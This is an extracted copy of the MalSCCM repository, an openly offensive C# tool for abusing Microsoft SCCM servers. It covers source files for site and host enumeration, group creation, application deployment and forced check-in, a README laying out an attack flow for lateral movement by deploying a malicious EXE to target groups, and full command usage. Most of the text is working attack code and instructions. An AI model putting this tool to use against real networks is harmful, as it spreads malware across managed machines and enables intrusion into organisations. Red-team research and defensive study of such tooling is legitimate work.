newInstance["RebootOutsideOfServiceWindows"] = false;
newInstance["OverrideServiceWindows"] = false;
newInstance["UseGMTTimes"] = true;
newInstance.Put();
Console.WriteLine("App Deployed");
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbDeploySCCMApplication.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbRemoveSCCMApplicationDeployment()
{
try
{
var Query = new SelectQuery("Select * FROM SMS_ApplicationAssignment WHERE ApplicationName = '" + App.AppName + "'");
var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
mgmtScope.Connect();
var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query);
ManagementObjectCollection objColl = mgmtSrchr.Get();
foreach (ManagementObject obj in objColl)
{
obj.Delete();
Console.WriteLine("object deleted");
}
Console.WriteLine("App deployment has been deleted successfully");
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbRemoveSCCMApplicationDeployment.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
}
================================================
FILE: MalSCCM/lib/Check.cs
================================================
using System;
using System.Management;
using MalSCCM.Commands;
public class Check
{
public static bool FbSCCMDeviceCheckin()
{
try
{
ManagementClass Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ClientOperation");
ManagementBaseObject newInstance = Class.GetMethodParameters("InitiateClientOperation");
newInstance["Type"] = 8;
newInstance["TargetCollectionID"] = Group.TargetCollectionID;
ManagementBaseObject result = Class.InvokeMethod("InitiateClientOperation",newInstance,null);
Console.WriteLine("ReturnValue: " + result.GetPropertyValue("ReturnValue"));
Console.WriteLine("OperationID: " + result.GetPropertyValue("OperationID"));
Console.WriteLine("Checkin succeeded.");
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbSCCMDeviceCheckin.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
}
================================================
FILE: MalSCCM/lib/Enum.cs
================================================
using System;
using System.Management;
using Microsoft.Win32;
using MalSCCM.Commands;
public class Enum
{
public static bool FbGetSiteScope()
{
try
{
var osQuery = new SelectQuery("SMS_Authority");
var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\ccm");
mgmtScope.Connect();
var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, osQuery);
foreach (var result in mgmtSrchr.Get())
{
var siteCode = result.GetPropertyValue("Name").ToString();
var managementServer = result.GetPropertyValue("CurrentManagementPoint").ToString();
if (!string.IsNullOrEmpty(siteCode))
{
Console.WriteLine("SiteCode: " + siteCode.Remove(0, 4));
Console.WriteLine("ManagementPoint: " + managementServer);
Inspect.SiteCode = siteCode.Remove(0, 4);
return true;
}
}
return false;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbGetSiteScope.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbGetSiteScope2()
{
try
{
var osQuery = new SelectQuery("SMS_ProviderLocation");
var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms");
mgmtScope.Connect();
var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, osQuery);
foreach (var result in mgmtSrchr.Get())
{
var siteCode = result.GetPropertyValue("SiteCode").ToString();
var localsite = result.GetPropertyValue("ProviderForLocalSite").ToString();
if (!string.IsNullOrEmpty(siteCode))
{
Console.WriteLine("SiteCode: " + siteCode);
Inspect.SiteCode = siteCode;
return true;
}
}
return false;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbGetSiteScope2.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbGetSiteScope3()
{
try
{
const string keyName = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\Mobile Client";
string assignedsitecode = (string)Registry.GetValue(keyName, "AssignedSiteCode", "No assigned site found, is this machine managed by SCCM?");
Console.WriteLine("SiteCode: " + assignedsitecode);
Inspect.SiteCode = assignedsitecode;
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbGetSiteScope3.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbGetSCCMComputer()
{
try
{
var Query = new SelectQuery("SMS_R_System");
var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
SCCMNamespace.Connect();
var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
foreach (var result in mgmtSrchr.Get())
{
var CompName = result.GetPropertyValue("Name").ToString();
if (!string.IsNullOrEmpty(CompName))
{
Console.WriteLine("Computer: " + CompName);
}
}
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbGetSCCMComputer.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbGetSCCMADForest()
{
try
{
var Query = new SelectQuery("SMS_ADForest");
var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
SCCMNamespace.Connect();
var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
foreach (var result in mgmtSrchr.Get())
{
var Forest = result.GetPropertyValue("Description").ToString();
if (!string.IsNullOrEmpty(Forest))
{
Console.WriteLine("Forest: " + Forest);
}
}
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbGetSCCMADForest.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbGetSCCMApplication()
{
try
{
var Query = new SelectQuery("SMS_Application");
var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
SCCMNamespace.Connect();
var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
foreach (var result in mgmtSrchr.Get())
{
var DisplayName = result.GetPropertyValue("LocalizedDisplayName").ToString();
if (!string.IsNullOrEmpty(DisplayName))
{
Console.WriteLine("Application Name: " + DisplayName);
}
}
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbGetSCCMApplication.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbGetSCCMPackage()
{
try
{
var Query = new SelectQuery("SMS_Package");
var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
SCCMNamespace.Connect();
var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
foreach (var result in mgmtSrchr.Get())
{
var Source = result.GetPropertyValue("PkgSourcePath").ToString();
if (!string.IsNullOrEmpty(Source))
{
Console.WriteLine("Package Source: " + Source);
}
}
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbGetSCCMPackage.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbGetSCCMCollection()
{
try
{
var Query = new SelectQuery("SMS_Collection");
var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
SCCMNamespace.Connect();
var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
foreach (var result in mgmtSrchr.Get())
{
var Name = result.GetPropertyValue("Name").ToString();
var Count = result.GetPropertyValue("MemberCount").ToString();
if (!string.IsNullOrEmpty(Name))
{
Console.WriteLine("Group: " + Name);
}
if (!string.IsNullOrEmpty(Count))
{
Console.WriteLine("Member Count: " + Count);
}
}
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbGetSCCMCollection.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbGetSCCMPrimaryUser()
{
try
{
var Query = new SelectQuery("SMS_UserMachineRelationship");
var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
SCCMNamespace.Connect();
var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
foreach (var result in mgmtSrchr.Get())
{
var ResourceName = result.GetPropertyValue("ResourceName").ToString();
var UniqueUserName = result.GetPropertyValue("UniqueUserName").ToString();
if (!string.IsNullOrEmpty(ResourceName))
{
Console.WriteLine("Computer: " + ResourceName);
}
if (!string.IsNullOrEmpty(UniqueUserName))
{
Console.WriteLine("User: " + UniqueUserName);
}
}
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbGetSCCMPrimaryUser.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbGetSCCMDeployments()
{
try
{
var Query = new SelectQuery("SMS_ApplicationAssignment");
var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
SCCMNamespace.Connect();
var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
foreach (var result in mgmtSrchr.Get())
{
var AppName = result.GetPropertyValue("ApplicationName").ToString();
var AssignmentName = result.GetPropertyValue("AssignmentName").ToString();
if (!string.IsNullOrEmpty(AppName))
{
Console.WriteLine("ApplicationName: " + AppName);
}
if (!string.IsNullOrEmpty(AssignmentName))
{
Console.WriteLine("AssignmentName: " + AssignmentName);
}
}
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbGetSCCMDeployments.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbGetSCCMPrimaryServerRegKey()
{
try
{
const string keyName = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\DP";
string mgmtServer = (string)Registry.GetValue(keyName, "ManagementPoints", "Management key not found, are you an SCCM client?");
string siteServer = (string)Registry.GetValue(keyName, "SiteServer", "Key not found, are you on a management server?");
const string keyNameID = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\Identification";
string siteServerID = (string)Registry.GetValue(keyNameID, "Site Server", "Key not found, are you on a management server?");
Console.WriteLine("Management Server: {0}", mgmtServer);
Console.WriteLine("Primary Server: {0}", siteServer);
Console.WriteLine("Primary Server (alternate reg key): {0}", siteServerID);
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbGetSCCMPrimaryServerRegKey.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
}
================================================
FILE: MalSCCM/lib/Groups.cs
================================================
using System;
using System.Management;
using MalSCCM.Commands;
public class Groups
{
public static bool FbGetSCCMCollectionID()
{
try
{
var Query = new SelectQuery("SMS_Collection");
var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode);
SCCMNamespace.Connect();
var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
foreach (var result in mgmtSrchr.Get())
{
var Name = result.GetPropertyValue("Name").ToString();
if (Name == "All Systems")
{
var ID = result.GetPropertyValue("CollectionID").ToString();
Console.WriteLine("SystemCollectionID: " + ID);
Group.SystemCollectionID = ID;
}
if (Name == "All Users")
{
var ID = result.GetPropertyValue("CollectionID").ToString();
Console.WriteLine("UserCollectionID: " + ID);
Group.UserCollectionID = ID;
}
if (Name == Group.GroupName)
{
var ID = result.GetPropertyValue("CollectionID").ToString();
Console.WriteLine("TargetGroupID: " + ID);
Group.TargetCollectionID = ID;
}
}
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbGetSCCMCollectionID.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbNewSCCMCollection()
{
try
{
ManagementClass Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection");
ManagementObject newInstance = Class.CreateInstance();
newInstance["Name"] = Group.GroupName;
newInstance["OwnedByThisSite"] = "True";
if (Group.GroupType == "user")
{
Console.WriteLine("Setting up user group type");
newInstance["LimitToCollectionID"] = Group.UserCollectionID;
newInstance["CollectionType"] = 1;
}
if (Group.GroupType == "device")
{
Console.WriteLine("Setting up device group type");
newInstance["LimitToCollectionID"] = Group.SystemCollectionID;
newInstance["CollectionType"] = 2;
}
Console.WriteLine("Commiting instance");
newInstance.Put(); //to commit the new instance.
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbNewSCCMCollection.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbRemoveSCCMCollection()
{
try
{
ManagementObject objHostSetting = new ManagementObject();
objHostSetting.Scope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode);
//define lookup query
string strQuery = @"SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'";
objHostSetting.Path = new ManagementPath(strQuery);
//delete the Managementobject
objHostSetting.Delete();
Console.WriteLine("Group has been deleted successfully");
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbRemoveSCCMCollection.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbGetUserResourceID()
{
try
{
var Query = new SelectQuery("SMS_R_User");
var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode);
SCCMNamespace.Connect();
var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
foreach (var result in mgmtSrchr.Get())
{
var Name = result.GetPropertyValue("UniqueUserName").ToString();
if (Name == Group.UserName)
{
var ID = result.GetPropertyValue("ResourceID").ToString();
Console.WriteLine("Resource: " + ID);
Group.ResourceID = ID;
}
}
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbGetSCCMCollectionID.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbAddUserToSCCMCollection()
{
try
{
ManagementClass collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null);
ManagementObject collQueryInstance = collQuery.CreateInstance();
collQueryInstance["QueryExpression"] = "Select * from SMS_R_User Where UniqueUserName='" + Group.UserName + "'";
collQueryInstance["RuleName"] = "Members of collection";
ManagementObject collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'");
ManagementBaseObject inParams = collInstance.GetMethodParameters("AddMembershipRule");
Console.WriteLine("Commiting instance");
inParams.SetPropertyValue("collectionRule", collQueryInstance);
ManagementBaseObject outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null);
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbAddUserToSCCMCollection.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
// To Do
public static bool FbRemoveUserFromSCCMCollection()
{
try
{
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbRemoveUserFromSCCMCollection.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbAddDeviceToSCCMCollection()
{
try
{
ManagementClass collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null);
ManagementObject collQueryInstance = collQuery.CreateInstance();
collQueryInstance["QueryExpression"] = "Select * from SMS_R_System Where Name='" + Group.DeviceName + "'";
collQueryInstance["RuleName"] = "Members of collection";
ManagementObject collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'");
ManagementBaseObject inParams = collInstance.GetMethodParameters("AddMembershipRule");
Console.WriteLine("Commiting instance");
inParams.SetPropertyValue("collectionRule", collQueryInstance);
ManagementBaseObject outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null);
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbAddDeviceToSCCMCollection.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
// To Do
public static bool FbRemoveDeviceFromSCCMCollection()
{
try
{
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbRemoveDeviceFromSCCMCollection.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
}
================================================
FILE: MalSCCM.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.31410.357
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MalSCCM", "MalSCCM\MalSCCM.csproj", "{5439CECD-3BB3-4807-B33F-E4C299B71CA2}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{5439CECD-3BB3-4807-B33F-E4C299B71CA2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{5439CECD-3BB3-4807-B33F-E4C299B71CA2}.Debug|Any CPU.Build.0 = Debug|Any CPU
{5439CECD-3BB3-4807-B33F-E4C299B71CA2}.Release|Any CPU.ActiveCfg = Release|Any CPU
{5439CECD-3BB3-4807-B33F-E4C299B71CA2}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {65372B47-6CC9-44C1-BB14-E26E7D124981}
EndGlobalSection
EndGlobal
================================================
FILE: README.md
================================================
# MalSCCM
This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage. To use this tool your current process must have admin rights over the SCCM server.
Typically deployments of SCCM will either have the management server and the primary server on the same host, in which case the host returned from the locate command can be used as the primary server.
If that is not the case you will need to compromise the management host returned with locate so that you can then run locate again on that host and get the primary server hostname. Once you have that and admin access you are good to go!
# Blog
For more information on usage of the tool, refer to the blog below.
* https://labs.nettitude.com/blog/introducing-malsccm/
# Credits
Massive credit to PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) which this is all based off, this would not have been done without the work of @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation.
# Attack Flow
* Compromise client, use locate to find management server
* Compromise management server, use locate to find primary server
* use Inspect on primary server to view who you can target
* Create a new device group for the machines you want to laterally move too
* Add your targets into the new group
* Create an application pointing to a malicious EXE on a world readable share
* Deploy the application to the target group
* Force the target group to checkin for updates
* Profit...
* Cleanup the application and deployment
* Delete the group
# Help menu
```
Commands listed below have optional parameters in <>.
Attempt to find the SCCM management and primary servers:
MalSCCM.exe locate
Inspect the primary server to gather SCCM information:
MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>
Create/Deploy/Delete malicious applications:
MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>
Force devices of a group to checkin within a couple minutes:
MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>
```
gitextract_m5iwekm3/ ├── .gitignore ├── MalSCCM/ │ ├── Args/ │ │ ├── ArgumentParser.cs │ │ ├── ArgumentParserResult.cs │ │ ├── CommandCollection.cs │ │ └── Info.cs │ ├── Commands/ │ │ ├── App.cs │ │ ├── Checkin.cs │ │ ├── Group.cs │ │ ├── ICommand.cs │ │ ├── Inspect.cs │ │ └── Locate.cs │ ├── MalSCCM.csproj │ ├── Program.cs │ ├── Properties/ │ │ └── AssemblyInfo.cs │ └── lib/ │ ├── Application.cs │ ├── Check.cs │ ├── Enum.cs │ └── Groups.cs ├── MalSCCM.sln └── README.md
SYMBOL INDEX (55 symbols across 15 files)
FILE: MalSCCM/Args/ArgumentParser.cs
class ArgumentParser (line 6) | public static class ArgumentParser
method Parse (line 8) | public static ArgumentParserResult Parse(IEnumerable<string> args)
FILE: MalSCCM/Args/ArgumentParserResult.cs
class ArgumentParserResult (line 5) | public class ArgumentParserResult
method ArgumentParserResult (line 10) | private ArgumentParserResult(bool parsedOk, Dictionary<string, string>...
method Success (line 16) | public static ArgumentParserResult Success(Dictionary<string, string> ...
method Failure (line 19) | public static ArgumentParserResult Failure()
FILE: MalSCCM/Args/CommandCollection.cs
class CommandCollection (line 7) | public class CommandCollection
method CommandCollection (line 18) | public CommandCollection()
method ExecuteCommand (line 28) | public bool ExecuteCommand(string commandName, Dictionary<string, stri...
FILE: MalSCCM/Args/Info.cs
class Info (line 5) | public static class Info
method ShowLogo (line 7) | public static void ShowLogo()
method ShowUsage (line 19) | public static void ShowUsage()
FILE: MalSCCM/Commands/App.cs
class App (line 6) | public class App : ICommand
method Execute (line 15) | public void Execute(Dictionary<string, string> arguments)
FILE: MalSCCM/Commands/Checkin.cs
class Checkin (line 6) | public class Checkin : ICommand
method Execute (line 12) | public void Execute(Dictionary<string, string> arguments)
FILE: MalSCCM/Commands/Group.cs
class Group (line 6) | public class Group : ICommand
method Execute (line 20) | public void Execute(Dictionary<string, string> arguments)
FILE: MalSCCM/Commands/ICommand.cs
type ICommand (line 5) | public interface ICommand
method Execute (line 7) | void Execute(Dictionary<string, string> arguments);
FILE: MalSCCM/Commands/Inspect.cs
class Inspect (line 6) | public class Inspect : ICommand
method Execute (line 13) | public void Execute(Dictionary<string, string> arguments)
FILE: MalSCCM/Commands/Locate.cs
class Locate (line 6) | public class Locate : ICommand
method Execute (line 13) | public void Execute(Dictionary<string, string> arguments)
FILE: MalSCCM/Program.cs
class Program (line 7) | class Program
method MainExecute (line 9) | private static void MainExecute(string commandName, Dictionary<string,...
method Main (line 30) | public static void Main(string[] args)
FILE: MalSCCM/lib/Application.cs
class Application (line 6) | public class Application
method FbCreateSCCMApplication (line 8) | public static bool FbCreateSCCMApplication()
method FbRemoveSCCMApplication (line 80) | public static bool FbRemoveSCCMApplication()
method FbDeploySCCMApplication (line 110) | public static bool FbDeploySCCMApplication()
method FbRemoveSCCMApplicationDeployment (line 175) | public static bool FbRemoveSCCMApplicationDeployment()
FILE: MalSCCM/lib/Check.cs
class Check (line 5) | public class Check
method FbSCCMDeviceCheckin (line 7) | public static bool FbSCCMDeviceCheckin()
FILE: MalSCCM/lib/Enum.cs
class Enum (line 6) | public class Enum
method FbGetSiteScope (line 8) | public static bool FbGetSiteScope()
method FbGetSiteScope2 (line 44) | public static bool FbGetSiteScope2()
method FbGetSiteScope3 (line 77) | public static bool FbGetSiteScope3()
method FbGetSCCMComputer (line 97) | public static bool FbGetSCCMComputer()
method FbGetSCCMADForest (line 125) | public static bool FbGetSCCMADForest()
method FbGetSCCMApplication (line 153) | public static bool FbGetSCCMApplication()
method FbGetSCCMPackage (line 181) | public static bool FbGetSCCMPackage()
method FbGetSCCMCollection (line 209) | public static bool FbGetSCCMCollection()
method FbGetSCCMPrimaryUser (line 243) | public static bool FbGetSCCMPrimaryUser()
method FbGetSCCMDeployments (line 276) | public static bool FbGetSCCMDeployments()
method FbGetSCCMPrimaryServerRegKey (line 309) | public static bool FbGetSCCMPrimaryServerRegKey()
FILE: MalSCCM/lib/Groups.cs
class Groups (line 5) | public class Groups
method FbGetSCCMCollectionID (line 7) | public static bool FbGetSCCMCollectionID()
method FbNewSCCMCollection (line 50) | public static bool FbNewSCCMCollection()
method FbRemoveSCCMCollection (line 87) | public static bool FbRemoveSCCMCollection()
method FbGetUserResourceID (line 112) | public static bool FbGetUserResourceID()
method FbAddUserToSCCMCollection (line 142) | public static bool FbAddUserToSCCMCollection()
method FbRemoveUserFromSCCMCollection (line 172) | public static bool FbRemoveUserFromSCCMCollection()
method FbAddDeviceToSCCMCollection (line 187) | public static bool FbAddDeviceToSCCMCollection()
method FbRemoveDeviceFromSCCMCollection (line 217) | public static bool FbRemoveDeviceFromSCCMCollection()
Condensed preview — 20 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (69K chars).
[
{
"path": ".gitignore",
"chars": 60,
"preview": ".vs\n*.user\n[Dd]ebug/\n[Rr]elease/\n[Bb]in/\n[Oo]bj/\n.DS_Store\n\n"
},
{
"path": "MalSCCM/Args/ArgumentParser.cs",
"chars": 1333,
"preview": "using System.Collections.Generic;\nusing System.Diagnostics;\n\nnamespace MalSCCM.Args\n{\n public static class ArgumentP"
},
{
"path": "MalSCCM/Args/ArgumentParserResult.cs",
"chars": 647,
"preview": "using System.Collections.Generic;\n\nnamespace MalSCCM.Args\n{\n public class ArgumentParserResult\n {\n public "
},
{
"path": "MalSCCM/Args/CommandCollection.cs",
"chars": 1815,
"preview": "using System;\nusing System.Collections.Generic;\nusing MalSCCM.Commands;\n\nnamespace MalSCCM.Args\n{\n public class Comm"
},
{
"path": "MalSCCM/Args/Info.cs",
"chars": 2027,
"preview": "using System;\n\nnamespace MalSCCM.Args\n{\n public static class Info\n {\n public static void ShowLogo()\n "
},
{
"path": "MalSCCM/Commands/App.cs",
"chars": 2970,
"preview": "using System;\nusing System.Collections.Generic;\n\nnamespace MalSCCM.Commands\n{\n public class App : ICommand\n {\n\n "
},
{
"path": "MalSCCM/Commands/Checkin.cs",
"chars": 1420,
"preview": "using System;\nusing System.Collections.Generic;\n\nnamespace MalSCCM.Commands\n{\n public class Checkin : ICommand\n {"
},
{
"path": "MalSCCM/Commands/Group.cs",
"chars": 3450,
"preview": "using System;\nusing System.Collections.Generic;\n\nnamespace MalSCCM.Commands\n{\n public class Group : ICommand\n {\n\n"
},
{
"path": "MalSCCM/Commands/ICommand.cs",
"chars": 168,
"preview": "using System.Collections.Generic;\n\nnamespace MalSCCM.Commands\n{\n public interface ICommand\n {\n void Execut"
},
{
"path": "MalSCCM/Commands/Inspect.cs",
"chars": 3356,
"preview": "using System;\nusing System.Collections.Generic;\n\nnamespace MalSCCM.Commands\n{\n public class Inspect : ICommand\n {"
},
{
"path": "MalSCCM/Commands/Locate.cs",
"chars": 1907,
"preview": "using System;\nusing System.Collections.Generic;\n\nnamespace MalSCCM.Commands\n{\n public class Locate : ICommand\n {\n"
},
{
"path": "MalSCCM/MalSCCM.csproj",
"chars": 2759,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "MalSCCM/Program.cs",
"chars": 1288,
"preview": "using System;\nusing System.Collections.Generic;\nusing MalSCCM.Args;\n\nnamespace MalSCCM\n{\n class Program\n {\n "
},
{
"path": "MalSCCM/Properties/AssemblyInfo.cs",
"chars": 1382,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "MalSCCM/lib/Application.cs",
"chars": 13758,
"preview": "using System;\nusing System.Management;\nusing System.Text;\nusing MalSCCM.Commands;\n\npublic class Application\n{\n publi"
},
{
"path": "MalSCCM/lib/Check.cs",
"chars": 1151,
"preview": "using System;\nusing System.Management;\nusing MalSCCM.Commands;\n\npublic class Check\n{\n public static bool FbSCCMDevic"
},
{
"path": "MalSCCM/lib/Enum.cs",
"chars": 11998,
"preview": "using System;\nusing System.Management;\nusing Microsoft.Win32;\nusing MalSCCM.Commands;\n\npublic class Enum\n{\n public s"
},
{
"path": "MalSCCM/lib/Groups.cs",
"chars": 8581,
"preview": "using System;\nusing System.Management;\nusing MalSCCM.Commands;\n\npublic class Groups\n{\n public static bool FbGetSCCMC"
},
{
"path": "MalSCCM.sln",
"chars": 1100,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.3141"
},
{
"path": "README.md",
"chars": 3036,
"preview": "# MalSCCM\n\nThis tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they man"
}
]
About this extraction
This page contains the full source code of the nettitude/MalSCCM GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 20 files (62.7 KB), approximately 14.4k tokens, and a symbol index with 55 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.